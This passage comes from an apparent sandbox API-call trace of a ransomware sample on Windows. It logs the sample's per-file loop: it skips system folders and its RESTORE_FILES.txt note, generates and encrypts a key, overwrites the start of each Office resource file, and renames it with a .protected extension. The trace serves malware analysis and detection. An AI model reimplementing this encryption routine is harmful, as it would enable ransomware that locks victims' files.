"c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.505] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll") returned 73 [0070.505] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".txt") returned 0x0 [0070.505] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll") returned 73 [0070.505] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".rar") returned 0x0 [0070.505] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll") returned 73 [0070.505] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".zip") returned 0x0 [0070.505] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.522] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.522] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.524] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.524] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.526] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, 
lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.526] CloseHandle (hObject=0xd8) returned 1 [0070.526] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.protected") returned 83 [0070.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll.protected")) returned 1 [0070.527] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.527] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="Windows") returned -1 [0070.527] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.527] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.527] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.527] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0070.527] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll") returned 69 [0070.527] StrStrIW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.527] lstrcmpW (lpString1="SGRES.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.527] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.527] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, 
dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.527] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.528] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll") returned 69 [0070.528] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.528] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll") returned 69 [0070.528] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.528] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll") returned 69 [0070.528] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.528] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.542] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.542] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.548] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.548] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, 
lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.548] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.548] CloseHandle (hObject=0xd8) returned 1 [0070.549] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.protected") returned 79 [0070.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll.protected")) returned 1 [0070.549] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.549] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0070.549] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.549] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.549] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.549] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0070.550] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll") returned 70 [0070.550] StrStrIW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.550] lstrcmpW (lpString1="STINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.550] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.550] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.550] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.550] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll") returned 70 [0070.550] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.550] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll") returned 70 [0070.550] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.550] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll") returned 70 [0070.550] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.550] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.561] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.561] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.562] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 
returned 1 [0070.562] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.566] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.566] CloseHandle (hObject=0xd8) returned 1 [0070.566] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.protected") returned 80 [0070.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll.protected")) returned 1 [0070.567] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.567] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="Windows") returned -1 [0070.567] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.567] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.567] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.567] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0070.567] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll") returned 72 [0070.567] StrStrIW (lpFirst="VISBRRES.DLL.trx_dll", 
lpSrch=".protected") returned 0x0 [0070.567] lstrcmpW (lpString1="VISBRRES.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.567] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.567] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.567] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.568] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll") returned 72 [0070.568] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.568] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll") returned 72 [0070.568] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.568] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll") returned 72 [0070.568] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.568] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.579] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.579] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, 
lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.580] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.580] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.581] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.581] CloseHandle (hObject=0xd8) returned 1 [0070.582] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.protected") returned 82 [0070.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll.protected")) returned 1 [0070.583] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.583] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0070.583] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.583] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.583] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.583] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0070.583] wnsprintfW (in: 
pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll") returned 71 [0070.583] StrStrIW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.583] lstrcmpW (lpString1="VISINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.583] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.583] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.583] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.583] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll") returned 71 [0070.583] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.583] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll") returned 71 [0070.583] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.583] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll") returned 71 [0070.584] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.584] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.601] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0070.601] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.602] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.602] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.613] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.613] CloseHandle (hObject=0xd8) returned 1 [0070.614] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.protected") returned 81 [0070.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll.protected")) returned 1 [0070.614] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.615] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="Windows") returned 1 [0070.615] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.615] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.615] lstrcmpiW 
(lpString1="WWINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.615] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0070.615] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll") returned 70 [0070.615] StrStrIW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.615] lstrcmpW (lpString1="WWINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.615] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.615] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.615] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.615] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll") returned 70 [0070.615] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.615] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll") returned 70 [0070.615] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.615] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll") returned 70 [0070.615] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.615] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, 
lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.639] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.639] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.640] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.640] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.645] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.645] CloseHandle (hObject=0xd8) returned 1 [0070.645] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.protected") returned 80 [0070.646] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll.protected")) returned 1 [0070.646] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.646] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="Windows") returned 1 [0070.646] lstrcmpiW 
